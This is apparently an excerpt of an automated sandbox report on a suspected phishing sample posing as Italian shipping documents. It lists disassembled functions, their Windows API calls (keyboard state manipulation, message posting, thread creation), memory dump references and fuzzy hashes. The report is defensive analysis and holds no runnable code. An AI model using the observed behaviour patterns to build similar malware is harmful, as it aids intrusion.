                        • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ErrorLastselect
                        • String ID:
                        • API String ID: 215497628-0
                        • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                        • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                        • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                        • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                        Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetParent.USER32(?), ref: 0044443B
                        • GetKeyboardState.USER32(?), ref: 00444450
                        • SetKeyboardState.USER32(?), ref: 004444A4
                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: MessagePost$KeyboardState$Parent
                        • String ID:
                        • API String ID: 87235514-0
                        • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                        • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                        • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                        • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                        Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetParent.USER32(?), ref: 00444633
                        • GetKeyboardState.USER32(?), ref: 00444648
                        • SetKeyboardState.USER32(?), ref: 0044469C
                        • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                        • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                        • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                        • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: MessagePost$KeyboardState$Parent
                        • String ID:
                        • API String ID: 87235514-0
                        • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                        • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                        • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                        • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                        Function 0045537F Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                        • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                        • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                        • DeleteObject.GDI32(?), ref: 00455736
                        • DeleteObject.GDI32(?), ref: 00455744
                        • DestroyIcon.USER32(?), ref: 00455752
                        • DestroyWindow.USER32(?), ref: 00455760
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                        • String ID:
                        • API String ID: 2354583917-0
                        • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                        • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                        • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                        • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                        Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                        • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                        • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                        • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                        Function 0044882A Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                        Download Yara Rule
                        APIs
                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                        • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Window$Enable$Show$MessageMoveSend
                        • String ID:
                        • API String ID: 896007046-0
                        • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                        • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                        • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                        • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                        Function 00448AB2 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                        • GetFocus.USER32 ref: 00448ACF
                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Window$Enable$Show$FocusMessageSend
                        • String ID:
                        • API String ID: 3429747543-0
                        • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                        • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                        • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                        • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                        Function 00401250 Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                          • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                          • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                        • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                        • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                        • String ID:
                        • API String ID: 3300667738-0
                        • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                        • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                        • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                        • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                        Function 0045D448 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                        • __swprintf.LIBCMT ref: 0045D4E9
                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ErrorMode$InformationVolume__swprintf
                        • String ID: %lu$\VH
                        • API String ID: 3164766367-2432546070
                        • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                        • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                        • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                        • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                        Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                        • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                        • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: Msctls_Progress32
                        • API String ID: 3850602802-3636473452
                        • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                        • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                        • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                        • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                        Function 00455531 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                        • String ID:
                        • API String ID: 3985565216-0
                        • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                        • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                        • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                        • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                        Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _malloc.LIBCMT ref: 0041F707
                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                        • _free.LIBCMT ref: 0041F71A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: AllocateHeap_free_malloc
                        • String ID: [B
                        • API String ID: 1020059152-632041663
                        • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                        • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                        • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                        • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                        Function 00413D7F Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                        Download Yara Rule
                        APIs
                        • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                        • __calloc_crt.LIBCMT ref: 00413DB0
                        • __getptd.LIBCMT ref: 00413DBD
                        • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                        • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                        • _free.LIBCMT ref: 00413E07
                        • __dosmaperr.LIBCMT ref: 00413E12
                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                        • String ID:
                        • API String ID: 155776804-0
                        • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                        • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                        • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                        • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                        Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                          • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                        • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                        • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                        • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                        • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                        • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                        • String ID:
                        • API String ID: 1957940570-0
                        • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                        • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                        • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                        • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                        Function 00413D1A Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                        Download Yara Rule
                        APIs
                        • ___set_flsgetvalue.LIBCMT ref: 00413D20
                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                        • ___fls_getvalue@4.LIBCMT ref: 00413D2B
